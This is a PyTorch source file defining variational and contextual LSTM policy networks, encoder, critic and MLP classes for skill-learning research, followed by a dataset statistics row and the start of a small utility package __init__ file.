# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
sampled_z_index = mean_outputs + variance_outputs*noise
# Ought to be able to pass gradients through this latent_z now.
sampled_z_index = sampled_z_index.squeeze(1)
##################################################
# Modify z's based on whether b was 1 or 0.
##################################################
if new_z_selection:
if not(self.translation_network):
# Set initial b to 1.
sampled_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
sampled_z_index[t, torch.where(sampled_b[t]==0)[0]] = sampled_z_index[t-1, torch.where(sampled_b[t]==0)[0]]
# How to vectorize this op?
# In general, need to spend some time rewriting this entire function.?
##################################################
# Get z probabilities, KL and prior values.
##################################################
# Also compute logprobabilities of the latent_z's sampled from this net.
if self.args.batch_size>1:
variational_z_logprobabilities = self.dists.log_prob(sampled_z_index)
else:
variational_z_logprobabilities = self.dists.log_prob(sampled_z_index.unsqueeze(1))
variational_z_probabilities = None
# Set standard distribution for KL.
self.standard_distribution = torch.distributions.MultivariateNormal(torch.zeros((self.output_size)).to(device),torch.eye((self.output_size)).to(device))
# Compute KL.
kl_divergence = torch.distributions.kl_divergence(self.dists, self.standard_distribution)
# Prior loglikelihood
prior_loglikelihood = self.standard_distribution.log_prob(sampled_z_index)
if self.args.debug:
print("#################################")
print("Embedding in Variational Network.")
embed()
if self.translation_network:
if evaluate_z_probability is None:
return sampled_z_index
else:
return self.dists.log_prob(evaluate_z_probability)
else:
return sampled_z_index, sampled_b, variational_b_logprobabilities.squeeze(1), \
variational_z_logprobabilities, variational_b_probabilities.squeeze(1), variational_z_probabilities, kl_divergence, prior_loglikelihood
def get_probabilities(self, input, epsilon, precomputed_b=None, evaluate_value=None):
return self.forward(input, epsilon, precomputed_b=precomputed_b, evaluate_z_probability=evaluate_value)
class ContinuousContextualVariationalPolicyNetwork(ContinuousVariationalPolicyNetwork_Batch):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4):
super(ContinuousContextualVariationalPolicyNetwork, self).__init__(input_size, hidden_size, z_dimensions, args, number_layers)
# Define a bidirectional LSTM now.
self.z_dimensions = self.args.z_dimensions
self.contextual_lstm = torch.nn.LSTM(input_size=self.args.z_dimensions,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True, dropout=self.args.dropout)
# self.z_output_layer = torch.nn.Linear(2*self.hidden_size, self.z_dimensions)
self.contextual_mean_output_layer = torch.nn.Linear(2*self.hidden_size,self.output_size)
self.contextual_variances_output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
def forward(self, input, epsilon, new_z_selection=True, batch_size=None, batch_trajectory_lengths=None):
# First run the forward function of the original variational network.
# This runs the initial LSTM and predicts the original embedding of skills.
sampled_z_index, sampled_b, variational_b_logprobabilities, \
variational_z_logprobabilities, variational_b_probabilities, \
variational_z_probabilities, kl_divergence, prior_loglikelihood = \
super().forward(input, epsilon, new_z_selection=new_z_selection, batch_size=batch_size, batch_trajectory_lengths=batch_trajectory_lengths)
# Now parse the sequence of per timestep z's to sequence of z's of length = the number of skills in the trajectory.
# The latent_b vector has this information, specified in terms of when b=1.
distinct_indices_collection = []
z_sequence_collection = []
# Also collect indices to mask, at specified mask fraction
mask_indices_collection = []
max_distinct_zs = 0
for j in range(self.args.batch_size):
# Mask z's that extend past the trajectory length.
sampled_b[batch_trajectory_lengths[j]:,j] = 0
sampled_z_index[batch_trajectory_lengths[j]:,j] = 0.
# Get times at which we actually observe distinct z's.
distinct_z_indices = torch.where(sampled_b[:,j])[0].clone().detach().cpu().numpy()
# Keep track of max, so that we can create a tensor of that size.
if len(distinct_z_indices)>max_distinct_zs:
max_distinct_zs = len(distinct_z_indices)
# mask_indices.append(np.random.choice(distinct_z_indices, size=int(len(distinct_z_indices)*self.args.mask_fraction), replace=False))
# These mask indices index into the distinct_indices list, so the values in mask indices are positions in the list to be masked.
# Masking strategy - uniformly randomly sample mask_fraction arbitrarily.
number_mask_elements = np.ceil(len(distinct_z_indices)*self.args.mask_fraction).astype(int)
if number_mask_elements==1 and len(distinct_z_indices)==1:
number_mask_elements = 0
mask_indices = np.random.choice(range(len(distinct_z_indices)), size=number_mask_elements, replace=False)
mask_indices_collection.append(copy.deepcopy(mask_indices))
# Now copy over the masked indices into a single list.
distinct_indices_collection.append(copy.deepcopy(distinct_z_indices))
# Now actually mask the chosen mask indices.
masked_z = sampled_z_index[distinct_z_indices,j]
masked_z[mask_indices] = 0.
# Now copy over the masked indices into a single list.
z_sequence_collection.append(masked_z)
# Now that we've gotten the distinct z sequence, make padded tensor version of this.
self.initial_skill_embedding = torch.zeros((max_distinct_zs, self.args.batch_size, self.args.z_dimensions)).to(device).float()
# Having created a tensor for this, copy into the tensor.
for j in range(self.args.batch_size):
self.initial_skill_embedding[:len(z_sequence_collection[j]),j] = z_sequence_collection[j]
# Now that we've gotten the initial skill embeddings (from the distinct z sequence),
# Feed it into the contextual LSTM, and predict new contextual embeddings.
contextual_outputs, contextual_hidden = self.contextual_lstm(self.initial_skill_embedding)
# self.contextual_skill_embedding = self.z_output_layer(contextual_outputs)
# Now recreate distributions, so we can evaluate new KL.
self.contextual_mean = self.contextual_mean_output_layer(contextual_outputs)
var_epsilon = 0.001
self.contextual_variance = self.variance_factor*(self.variance_activation_layer(self.contextual_variances_output_layer(contextual_outputs))+self.variance_activation_bias) + var_epsilon
self.contextual_dists = torch.distributions.MultivariateNormal(self.contextual_mean, torch.diag_embed(self.contextual_variance))
if self.args.train:
noise = torch.randn_like(self.contextual_variance)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
self.contextual_skill_embedding = (self.contextual_mean + self.contextual_variance*noise).squeeze(1)
# Ought to be able to pass gradients through this latent_z now.
# If evaluating, greedily get action.
else:
self.contextual_skill_embedding = self.contextual_mean.squeeze(1)
#########
# Now must reconstruct the z vector (sampled_z_indices). # Incidentally this removes need for masking of z's.
# Must use the original sampled_b to take care of this.
new_sampled_z_indices = torch.zeros_like(sampled_z_index).to(device)
for j in range(self.args.batch_size):
# Use distinct_z_indices, where we have already computed torch.where(sampled_b[:,j]).
# May need to manipulate this to negate the where.
for k in range(len(distinct_indices_collection[j])-1):
new_sampled_z_indices[distinct_indices_collection[j][k]:distinct_indices_collection[j][k+1],j] = self.contextual_skill_embedding[k,j]
# new_sampled_z_indices[distinct_indices_collection[j][-1]:batch_trajectory_lengths[j],j] = self.contextual_skill_embedding[k+1,j]
new_sampled_z_indices[distinct_indices_collection[j][-1]:batch_trajectory_lengths[j],j] = self.contextual_skill_embedding[len(distinct_indices_collection[j])-1,j]
# Now recompute prior_loglikelihood with the new zs.
prior_loglikelihood = self.standard_distribution.log_prob(new_sampled_z_indices)
# Also recompute the KL.
# kl_divergence = torch.distributions.kl_divergence(self.contextual_dists, self.standard_distribution).mean()
# Return same objects as original forward function.
return new_sampled_z_indices, sampled_b, variational_b_logprobabilities, \
variational_z_logprobabilities, variational_b_probabilities, \
variational_z_probabilities, kl_divergence, prior_loglikelihood
class ContinuousNewContextualVariationalPolicyNetwork(ContinuousVariationalPolicyNetwork_Batch):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4):
super(ContinuousNewContextualVariationalPolicyNetwork, self).__init__(input_size, hidden_size, z_dimensions, args, number_layers)
# Define a bidirectional LSTM now.
self.z_dimensions = self.args.z_dimensions
self.contextual_lstm = torch.nn.LSTM(input_size=self.args.z_dimensions,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True, dropout=self.args.dropout)
# self.z_output_layer = torch.nn.Linear(2*self.hidden_size, self.z_dimensions)
self.contextual_mean_output_layer = torch.nn.Linear(2*self.hidden_size,self.output_size)
self.contextual_variances_output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
def forward(self, input, epsilon, new_z_selection=True, batch_size=None, batch_trajectory_lengths=None):
#####################
# First run the forward function of the original variational network.
# This runs the initial LSTM and predicts the original embedding of skills.
#####################
sampled_z_index, sampled_b, variational_b_logprobabilities, \
variational_z_logprobabilities, variational_b_probabilities, \
variational_z_probabilities, kl_divergence, prior_loglikelihood = \
super().forward(input, epsilon, new_z_selection=new_z_selection, batch_size=batch_size, batch_trajectory_lengths=batch_trajectory_lengths)
#####################
# Now parse the sequence of per timestep z's to sequence of z's of length = the number of skills in the trajectory.
# The latent_b vector has this information, specified in terms of when b=1.
#####################
# Create separate masking object.
contextual_mask = torch.ones_like(sampled_z_index).to(device).float()
for j in range(self.args.batch_size):
#####################
# Mask z's that extend past the trajectory length.
#####################
sampled_b[batch_trajectory_lengths[j]:,j] = 0
sampled_z_index[batch_trajectory_lengths[j]:,j] = 0.
contextual_mask[batch_trajectory_lengths[j]:,j] = 0.
#####################
# Get times at which we actually observe distinct z's.
#####################
distinct_z_indices = torch.where(sampled_b[:,j])[0].clone().detach().cpu().numpy()
#####################
# These mask indices index into the distinct_indices list, so the values in mask indices are positions in the list to be masked.
# Masking strategy - uniformly randomly sample mask_fraction arbitrarily.
#####################
number_mask_elements = np.ceil(len(distinct_z_indices)*self.args.mask_fraction).astype(int)
if number_mask_elements==1 and len(distinct_z_indices)==1:
number_mask_elements = 0
mask_indices = np.random.choice(range(len(distinct_z_indices)), size=number_mask_elements, replace=False)
#####################
# Now actually mask the chosen mask indices.
#####################
for k in range(len(mask_indices)):
if mask_indices[k]+1 >= len(distinct_z_indices):
end_index = contextual_mask.shape[0]
else:
end_index = distinct_z_indices[mask_indices[k]+1]
contextual_mask[distinct_z_indices[mask_indices[k]]:end_index,j] = 0
#####################
# Now mask the sampled input to create the masked input.
#####################
self.initial_skill_embedding = contextual_mask*sampled_z_index
#####################
# Now that we've gotten the initial skill embeddings (from the distinct z sequence),
# Feed it into the contextual LSTM, and predict new contextual embeddings.
#####################
contextual_outputs, contextual_hidden = self.contextual_lstm(self.initial_skill_embedding)
#####################
# Now recreate distributions, so we can evaluate new KL.
#####################
self.contextual_mean = self.contextual_mean_output_layer(contextual_outputs)
var_epsilon = 0.001
self.contextual_variance = self.variance_factor*(self.variance_activation_layer(self.contextual_variances_output_layer(contextual_outputs))+self.variance_activation_bias) + var_epsilon
self.contextual_dists = torch.distributions.MultivariateNormal(self.contextual_mean, torch.diag_embed(self.contextual_variance))
if self.args.train:
noise = torch.randn_like(self.contextual_variance)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
self.contextual_skill_embedding = (self.contextual_mean + self.contextual_variance*noise).squeeze(1)
# Ought to be able to pass gradients through this latent_z now.
# If evaluating, greedily get action.
else:
self.contextual_skill_embedding = self.contextual_mean.squeeze(1)
#####################
# Since the contextual embeddings are just predicted by an LSTM, use the same technique of "NEw z selection"
# as in the original variational network, that copies over the previous timesteps' z, if b at that timestep = 0. (i.e. continue).
#####################
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
# sampled_z_index[t, torch.where(sampled_b[t]==0)[0]] = sampled_z_index[t-1, torch.where(sampled_b[t]==0)[0]]
self.contextual_skill_embedding[t, torch.where(sampled_b[t]==0)[0]] = self.contextual_skill_embedding[t-1, torch.where(sampled_b[t]==0)[0]]
# Now recompute prior_loglikelihood with the new zs.
prior_loglikelihood = self.standard_distribution.log_prob(self.contextual_skill_embedding)
# Also recompute the KL.
kl_divergence = torch.distributions.kl_divergence(self.contextual_dists, self.standard_distribution)
#######
# Try ELMO embeddings.
if self.args.ELMO_embeddings:
self.elmo_contextual_skill_embedding = self.contextual_skill_embedding + sampled_z_index
else:
# If not using ELMO embedding, just use the newly predicted ones.
self.elmo_contextual_skill_embedding = self.contextual_skill_embedding
# Return same objects as original forward function.
return self.elmo_contextual_skill_embedding, sampled_b, variational_b_logprobabilities, \
variational_z_logprobabilities, variational_b_probabilities, \
variational_z_probabilities, kl_divergence, prior_loglikelihood
class EncoderNetwork(PolicyNetwork_BaseClass):
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
def __init__(self, input_size, hidden_size, output_size, number_subpolicies=4, batch_size=1, args=None):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(EncoderNetwork, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.number_subpolicies = number_subpolicies
self.args = args
self.batch_size = self.args.batch_size
self.num_layers = self.args.number_layers
# Define a bidirectional LSTM now.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True, dropout=self.args.dropout)
# Define output layers for the LSTM, and activations for this output layer.
# Because it's bidrectional, once we compute <outputs, hidden = self.lstm(input)>, we must concatenate:
# From reverse LSTM: <outputs[0,:,hidden_size:]> and from the forward LSTM: <outputs[-1,:,:hidden_size]>.
# (Refer - https://towardsdatascience.com/understanding-bidirectional-rnn-in-pytorch-5bd25a5dd66 )
# Because of this, the output layer must take in size 2*hidden.
self.hidden_layer = torch.nn.Linear(2*self.hidden_size, 2*self.hidden_size)
self.output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
# Sigmoid and Softmax activation functions for Bernoulli termination probability and latent z selection .
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
def forward(self, input, epsilon=0.0001):
# Input format must be: Sequence_Length x 1 x Input_Size.
# Assuming input is a numpy array.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
# Instead of iterating over time and passing each timestep's input to the LSTM, we can now just pass the entire input sequence.
outputs, hidden = self.lstm(format_input)
concatenated_outputs = torch.cat([outputs[0,:,self.hidden_size:],outputs[-1,:,:self.hidden_size]],dim=-1).view((1,self.batch_size,-1))
# Calculate preprobs.
preprobabilities = self.output_layer(self.hidden_layer(concatenated_outputs))
probabilities = self.batch_softmax_layer(preprobabilities)
logprobabilities = self.batch_logsoftmax_layer(preprobabilities)
latent_z = self.select_epsilon_greedy_action(probabilities, epsilon=epsilon)
# Return latentz_encoding as output layer of last outputs.
return latent_z, logprobabilities, None, None
def get_probabilities(self, input):
# Input format must be: Sequence_Length x 1 x Input_Size.
# Assuming input is a numpy array.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
# Instead of iterating over time and passing each timestep's input to the LSTM, we can now just pass the entire input sequence.
outputs, hidden = self.lstm(format_input)
concatenated_outputs = torch.cat([outputs[0,:,self.hidden_size:],outputs[-1,:,:self.hidden_size]],dim=-1).view((1,self.batch_size,-1))
# Calculate preprobs.
preprobabilities = self.output_layer(self.hidden_layer(concatenated_outputs))
probabilities = self.batch_softmax_layer(preprobabilities)
logprobabilities = self.batch_logsoftmax_layer(preprobabilities)
# Return latentz_encoding as output layer of last outputs.
return logprobabilities, probabilities
class ContinuousEncoderNetwork(PolicyNetwork_BaseClass):
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
def __init__(self, input_size, hidden_size, output_size, args, batch_size=1):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(ContinuousEncoderNetwork, self).__init__()
self.args = args
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.num_layers = self.args.var_number_layers
self.batch_size = self.args.batch_size
# Define a bidirectional LSTM now.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True)
# Define output layers for the LSTM, and activations for this output layer.
# # Because it's bidrectional, once we compute <outputs, hidden = self.lstm(input)>, we must concatenate:
# # From reverse LSTM: <outputs[0,:,hidden_size:]> and from the forward LSTM: <outputs[-1,:,:hidden_size]>.
# # (Refer - https://towardsdatascience.com/understanding-bidirectional-rnn-in-pytorch-5bd25a5dd66 )
# # Because of this, the output layer must take in size 2*hidden.
# self.hidden_layer = torch.nn.Linear(2*self.hidden_size, self.hidden_size)
# self.output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
# Sigmoid and Softmax activation functions for Bernoulli termination probability and latent z selection .
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
# Define output layers for the LSTM, and activations for this output layer.
self.mean_output_layer = torch.nn.Linear(2*self.hidden_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
self.activation_layer = torch.nn.Tanh()
self.variance_activation_layer = torch.nn.Softplus()
self.variance_activation_bias = 0.
self.variance_factor = 0.01
def forward(self, input, epsilon=0.001, z_sample_to_evaluate=None):
# This epsilon passed as an argument is just so that the signature of this function is the same as what's provided to the discrete encoder network.
# Input format must be: Sequence_Length x Batch_Size x Input_Size.
# Assuming input is a numpy array.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
# Instead of iterating over time and passing each timestep's input to the LSTM, we can now just pass the entire input sequence.
outputs, hidden = self.lstm(format_input)
concatenated_outputs = torch.cat([outputs[0,:,self.hidden_size:],outputs[-1,:,:self.hidden_size]],dim=-1).view((1,self.batch_size,-1))
# Predict Gaussian means and variances.
# if self.args.mean_nonlinearity:
# mean_outputs = self.activation_layer(self.mean_output_layer(concatenated_outputs))
# else:
mean_outputs = self.mean_output_layer(concatenated_outputs)
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(concatenated_outputs))+self.variance_activation_bias) + epsilon
dist = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
# Whether to use reparametrization trick to retrieve the
if self.args.reparam:
noise = torch.randn_like(variance_outputs)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
latent_z = mean_outputs + variance_outputs * noise
# Ought to be able to pass gradients through this latent_z now.
else:
# Retrieve sample from the distribution as the value of the latent variable.
latent_z = dist.sample()
# calculate entropy for training.
entropy = dist.entropy()
# Also retrieve log probability of the same.
logprobability = dist.log_prob(latent_z)
# Set standard distribution for KL.
self.standard_distribution = torch.distributions.MultivariateNormal(torch.zeros((self.output_size)).to(device),torch.eye((self.output_size)).to(device))
# Compute KL.
kl_divergence = torch.distributions.kl_divergence(dist, self.standard_distribution)
if self.args.debug:
print("###############################")
print("Embedding in Encoder Network.")
embed()
if z_sample_to_evaluate is None:
return latent_z, logprobability, entropy, kl_divergence
else:
logprobability = dist.log_prob(z_sample_to_evaluate)
return logprobability
class CriticNetwork(torch.nn.Module):
def __init__(self, input_size, hidden_size, output_size, args=None, number_layers=4):
super(CriticNetwork, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.number_layers = number_layers
self.batch_size = 1
# Create LSTM Network.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.number_layers)
self.output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
def forward(self, input):
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
lstm_outputs, hidden = self.lstm(format_input)
# Predict critic value for each timestep.
critic_value = self.output_layer(lstm_outputs)
return critic_value
class ContinuousMLP(torch.nn.Module):
def __init__(self, input_size, hidden_size, output_size, args=None, number_layers=4):
super(ContinuousMLP, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.args = args
self.input_layer = torch.nn.Linear(self.input_size, self.hidden_size)
self.hidden_layer1 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.hidden_layer2 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.hidden_layer3 = torch.nn.Linear(self.hidden_size, self.hidden_size)
if self.args.small_translation_model:
self.mean_output_layer = torch.nn.Linear(self.input_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(self.input_size,self.output_size)
else:
self.mean_output_layer = torch.nn.Linear(self.hidden_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(self.hidden_size, self.output_size)
self.variance_factor = 0.01
self.variance_activation_bias = 0.
if self.args.leaky_relu:
self.relu_activation = torch.nn.LeakyReLU()
else:
self.relu_activation = torch.nn.ReLU()
self.variance_activation_layer = torch.nn.Softplus()
# self.dropout_layer = torch.nn.Dropout(self.args.mlp_dropout)
# Don't use dropout for now...
self.dropout_layer = torch.nn.Dropout(self.args.dropout)
if self.args.batch_norm:
self.batch_norm_layer1 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer2 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer3 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer4 = torch.nn.BatchNorm1d(self.hidden_size)
def forward(self, input, greedy=False, action_epsilon=0.0001):
# Assumes input is Batch_Size x Input_Size.
if self.args.small_translation_model:
# final_layer = self.input_layer(input)
# Special input to output layer..
self.mean_outputs = self.mean_output_layer(input)
self.variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(input))+self.variance_activation_bias) + action_epsilon
else:
if self.args.batch_norm:
s1 = input.shape[0]
if len(input.shape)==3:
s2 = input.shape[1]
else:
s2 = 1
h1 = self.dropout_layer(self.relu_activation(self.batch_norm_layer1( self.input_layer(input).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h2 = self.dropout_layer(self.relu_activation(self.batch_norm_layer2( self.hidden_layer1(h1).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h3 = self.dropout_layer(self.relu_activation(self.batch_norm_layer3( self.hidden_layer2(h2).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = self.dropout_layer(self.relu_activation(self.batch_norm_layer4( self.hidden_layer3(h3).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = h4.squeeze(1)
else:
h1 = self.dropout_layer(self.relu_activation(self.input_layer(input)))
h2 = self.dropout_layer(self.relu_activation(self.hidden_layer1(h1)))
h3 = self.dropout_layer(self.relu_activation(self.hidden_layer2(h2)))
h4 = self.dropout_layer(self.relu_activation(self.hidden_layer3(h3)))
final_layer = h4
self.mean_outputs = self.mean_output_layer(final_layer)
self.variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(final_layer))+self.variance_activation_bias) + action_epsilon
# self.variance_value = 1e-5
self.variance_value = 0.05
self.variance_outputs = self.variance_value*torch.ones_like(self.mean_outputs).to(device).float()
noise = torch.randn_like(self.variance_outputs)
if greedy:
action = self.mean_outputs
else:
# Instead of *sampling* the action from a distribution, construct using mu + sig * eps (random noise).
action = self.mean_outputs + self.variance_outputs * noise
if self.args.residual_translation:
return action+input
else:
return action
def reparameterized_get_actions(self, input, greedy=False, action_epsilon=0.0001):
return self.forward(input, greedy, action_epsilon)
def get_probabilities(self, input, evaluate_value, action_epsilon):
# Run forward to set the variance and mean values.
_ = self.forward(input, action_epsilon=action_epsilon)
# Create distribution.
self.dists = torch.distributions.MultivariateNormal(self.mean_outputs, torch.diag_embed(self.variance_outputs))
# Evaluate logprobability.
return self.dists.log_prob(evaluate_value)
class CriticMLP(torch.nn.Module):
def __init__(self, input_size, hidden_size, output_size, args=None, number_layers=4):
super(CriticMLP, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.batch_size = 1
self.args = args
self.input_layer = torch.nn.Linear(self.input_size, self.hidden_size)
self.hidden_layer1 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.hidden_layer2 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.hidden_layer3 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.output_layer = torch.nn.Linear(self.hidden_size, self.output_size)
if self.args.leaky_relu:
self.relu_activation = torch.nn.LeakyReLU()
else:
self.relu_activation = torch.nn.ReLU()
self.dropout_layer = torch.nn.Dropout(self.args.mlp_dropout)
if self.args.batch_norm:
self.batch_norm_layer1 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer2 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer3 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer4 = torch.nn.BatchNorm1d(self.hidden_size)
def forward(self, input, greedy=False, action_epsilon=0.0001):
# Assumes input is Batch_Size x Input_Size.
if self.args.batch_norm:
s1 = input.shape[0]
if len(input.shape)==3:
s2 = input.shape[1]
else:
s2 = 1
h1 = self.dropout_layer(self.relu_activation(self.batch_norm_layer1( self.input_layer(input).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h2 = self.dropout_layer(self.relu_activation(self.batch_norm_layer2( self.hidden_layer1(h1).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h3 = self.dropout_layer(self.relu_activation(self.batch_norm_layer3( self.hidden_layer2(h2).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = self.dropout_layer(self.relu_activation(self.batch_norm_layer4( self.hidden_layer3(h3).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = h4.squeeze(1)
else:
h1 = self.dropout_layer(self.relu_activation(self.input_layer(input)))
h2 = self.dropout_layer(self.relu_activation(self.hidden_layer1(h1)))
h3 = self.dropout_layer(self.relu_activation(self.hidden_layer2(h2)))
h4 = self.dropout_layer(self.relu_activation(self.hidden_layer3(h3)))
# Predict critic value for each timestep.
critic_value = self.output_layer(h4)
return critic_value
class DiscreteMLP(torch.nn.Module):
def __init__(self, input_size, hidden_size, output_size, args=None, number_layers=4):
super(DiscreteMLP, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.args = args
self.input_layer = torch.nn.Linear(self.input_size, self.hidden_size)
self.hidden_layer1 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.hidden_layer2 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.hidden_layer3 = torch.nn.Linear(self.hidden_size, self.hidden_size)
self.output_layer = torch.nn.Linear(self.hidden_size, self.output_size)
if self.args.leaky_relu:
self.relu_activation = torch.nn.LeakyReLU()
else:
self.relu_activation = torch.nn.ReLU()
self.dropout_layer = torch.nn.Dropout(self.args.mlp_dropout)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
if self.args.batch_norm:
self.batch_norm_layer1 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer2 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer3 = torch.nn.BatchNorm1d(self.hidden_size)
self.batch_norm_layer4 = torch.nn.BatchNorm1d(self.hidden_size)
def forward(self, input):
# Assumes input is Batch_Size x Input_Size.
if self.args.batch_norm:
s1 = input.shape[0]
if len(input.shape)==3:
s2 = input.shape[1]
else:
s2 = 1
h1 = self.dropout_layer(self.relu_activation(self.batch_norm_layer1( self.input_layer(input).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h2 = self.dropout_layer(self.relu_activation(self.batch_norm_layer2( self.hidden_layer1(h1).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h3 = self.dropout_layer(self.relu_activation(self.batch_norm_layer3( self.hidden_layer2(h2).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = self.dropout_layer(self.relu_activation(self.batch_norm_layer4( self.hidden_layer3(h3).view(-1,self.hidden_size) ).view(s1, s2, self.hidden_size) ))
h4 = h4.squeeze(1)
else:
h1 = self.dropout_layer(self.relu_activation(self.input_layer(input)))
h2 = self.dropout_layer(self.relu_activation(self.hidden_layer1(h1)))
h3 = self.dropout_layer(self.relu_activation(self.hidden_layer2(h2)))
h4 = self.dropout_layer(self.relu_activation(self.hidden_layer3(h3)))
# Compute preprobability with output layer.
preprobability_outputs = self.output_layer(h4)
# Compute probabilities and logprobabilities.
log_probabilities = self.batch_logsoftmax_layer(preprobability_outputs)
probabilities = self.batch_softmax_layer(preprobability_outputs)
return log_probabilities, probabilities
def get_probabilities(self, input):
return self.forward(input) | 43.762009 | 186 | 0.742424 | 14,238 | 100,215 | 4.983425 | 0.045161 | 0.024946 | 0.02348 | 0.01446 | 0.864546 | 0.840996 | 0.817628 | 0.802731 | 0.78603 | 0.772247 | 0 | 0.011803 | 0.137664 | 100,215 | 2,290 | 187 | 43.762009 | 0.809243 | 0.294128 | 0 | 0.743838 | 0 | 0 | 0.007814 | 0.001924 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059859 | false | 0.00088 | 0.00088 | 0.007042 | 0.125 | 0.008803 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5858cc1fd3e6d919b2c66680f65125e843a628d0 | 307 | py | Python | pearl/utils/__init__.py | tknapen/pearl_3T | 1bf97ee3814d7e78316bffeba59f0c512b948128 | [
"MIT"
] | 1 | 2019-11-25T02:27:56.000Z | 2019-11-25T02:27:56.000Z | pearl/utils/__init__.py | tknapen/stn_control_conflict | 5e199973002766349b7eb13a04dafe62827f34ec | [
"MIT"
] | null | null | null | pearl/utils/__init__.py | tknapen/stn_control_conflict | 5e199973002766349b7eb13a04dafe62827f34ec | [
"MIT"
] | null | null | null | from .utils import mask_nii_2_hdf5, \
roi_data_from_hdf, \
convert_mapper_data_to_session, \
natural_sort
__all__ = [ 'mask_nii_2_hdf5',
'roi_data_from_hdf',
'convert_mapper_data_to_session',
'natural_sort'
